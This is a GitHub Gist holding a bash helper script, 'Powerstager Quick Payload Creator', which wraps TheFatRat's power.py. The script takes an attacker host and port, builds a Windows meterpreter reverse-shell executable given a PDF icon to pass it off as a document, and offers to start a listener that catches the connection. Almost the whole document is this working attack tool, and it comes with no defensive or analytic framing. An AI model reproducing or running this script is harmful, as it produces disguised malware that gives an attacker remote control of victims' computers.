Last active
January 31, 2020 21:16
-
-
Save nimaid/046b7d7f1563a7cef0345837ed742f5f to your computer and use it in GitHub Desktop.
A simple helper script for creating Powerstager payloads.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| set -e | |
| PYTHONEXE=python | |
| PSSCRIPT=/root/TheFatRat/tools/power.py | |
| POWERSTAGER="$PYTHONEXE $PSSCRIPT" | |
| ICON=pdf.ico | |
| echo | |
| echo Powerstager Quick Payload Creator | |
| echo v0.3 by nimaid | |
| echo | |
| function usage() { | |
| echo Usage: $(basename $0) host port output [arch] | |
| echo arch can be 32 or 64 \(default: 64\) | |
| exit 1 | |
| } | |
| function is_valid_port() { | |
| if [ -n "$1" ] && [ "$1" -eq "$1" ] 2> /dev/null; then | |
| if [ "$1" -gt "1024" ] && [ "$1" -le "65535" ]; then | |
| true | |
| else | |
| false | |
| fi | |
| else | |
| false | |
| fi | |
| } | |
| function lowercase() { | |
| echo "$1" | tr '[:upper:]' '[:lower:]' | |
| } | |
| function get_extention() { | |
| if [ -z "$1" ]; then | |
| return | |
| fi | |
| FILENAME="${1##*/}" # Strip longest match of */ from start | |
| BASE="${FILENAME%.[^.]*}" # Strip shortest match of . plus at least one non-dot char from end | |
| EXT="${FILENAME:${#BASE} + 1}" # Substring from len of base thru end | |
| if [[ -z "$BASE" && -n "$EXT" ]]; then # If we have an extension and no base, it's really the base | |
| BASE=".$EXT" | |
| EXT="" | |
| fi | |
| echo $(lowercase $EXT) | |
| } | |
| function is_valid_ip() | |
| { | |
| local ip=$1 | |
| local stat=1 | |
| if [[ $ip =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then | |
| OIFS=$IFS | |
| IFS='.' | |
| ip=($ip) | |
| IFS=$OIFS | |
| [[ ${ip[0]} -le 255 && ${ip[1]} -le 255 \ | |
| && ${ip[2]} -le 255 && ${ip[3]} -le 255 ]] | |
| stat=$? | |
| fi | |
| return $stat | |
| } | |
| function check_ping() { | |
| if $(ping -c 1 $1 &> /dev/null); then | |
| true | |
| else | |
| false | |
| fi | |
| } | |
| function resolve_ip() { | |
| if [ -z "$1" ]; then | |
| return | |
| elif is_valid_ip $1; then | |
| echo $1 | |
| elif ! check_ping $1; then | |
| return | |
| else | |
| RESOLVED_IP=$(dig +short $1) | |
| if [ -z "$RESOLVED_IP" ]; then | |
| RESOLVED_IP=$1 | |
| fi | |
| echo $RESOLVED_IP | |
| return | |
| fi | |
| } | |
| HOST=$1 | |
| if [ -z "$HOST" ]; then | |
| usage | |
| fi | |
| PORT=$2 | |
| if [ -z "$PORT" ]; then | |
| echo No port supplied! | |
| usage | |
| elif ! is_valid_port $PORT; then | |
| echo Port $PORT is not a valid integer in range 1025-65535 | |
| usage | |
| fi | |
| EXEPATH=$3 | |
| if [ -z "$EXEPATH" ]; then | |
| echo No EXE path provided! | |
| usage | |
| elif [ "$(get_extention $EXEPATH)" != "exe" ]; then | |
| EXEPATH=${EXEPATH}.exe | |
| echo Appended .exe to output name. | |
| echo | |
| fi | |
| ARCH=$4 | |
| if [ -z "$ARCH" ]; then | |
| echo No architecture supplied, using 64-bit... | |
| ARCH=64 | |
| fi | |
| if [ "$ARCH" != "32" ] && [ "$ARCH" != "64" ]; then | |
| echo The architecture option $ARCH is not valid. | |
| usage | |
| fi | |
| if $(check_ping $HOST); then | |
| HOST_IP=$(resolve_ip $HOST) | |
| printf "Host $HOST is reachable" | |
| if [ "$HOST_IP" != "$HOST" ]; then | |
| echo , it\'s IP is $HOST_IP | |
| else | |
| echo . | |
| fi | |
| else | |
| HOST_IP=$HOST | |
| echo Host $HOST is not reachable! The payload may not connect! | |
| fi | |
| $POWERSTAGER --target win${ARCH} --meterpreter --lhost $HOST_IP --lport $PORT --icon $ICON --output $EXEPATH | |
| PSLISTENER="$POWERSTAGER --listener --lport $PORT" | |
| echo | |
| read -p "Open listener? (y/n): " -n 1 -r | |
| echo | |
| if [[ $REPLY =~ ^[Yy]$ ]] | |
| then | |
| $PSLISTENER | |
| fi | |
| echo | |
| echo You can run the listener anytime with the following command: | |
| echo $PSLISTENER | |
| echo |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment